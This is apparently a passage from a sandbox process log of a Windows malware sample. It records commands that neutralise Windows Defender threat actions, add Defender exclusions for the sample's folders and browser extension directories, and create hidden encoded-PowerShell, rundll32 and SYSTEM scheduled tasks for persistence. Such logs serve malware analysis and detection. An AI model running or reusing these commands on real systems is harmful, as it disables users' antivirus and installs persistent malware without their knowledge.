\"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gICjdiRSO" /SC once /ST 10:50:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gICjdiRSO"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gICjdiRSO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 11:32:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe\" Wy /BExididMQ 757674 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"

C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe

C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe Wy /BExididMQ 757674 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2996 -ip 2996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 908

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\dVmANv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\SBIkhNc.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "OcPshDNvhDnVmSv"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "OcPshDNvhDnVmSv"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\FnlJVMA.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\Mpmbkxe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\izrRiZa.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\wpsSjdR.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1964

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 02:53:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\BliLFRQi\dtsjWWz.dll\",#1 /yUAdidtcar 757674" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "MRTHivZIQsRdEanwm"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\BliLFRQi\dtsjWWz.dll",#1 /yUAdidtcar 757674

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\BliLFRQi\dtsjWWz.dll",#1 /yUAdidtcar 757674

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2132

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YAAFs1" /SC once /ST 15:24:21 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YAAFs1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae50a46f8,0x7ffae50a4708,0x7ffae50a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

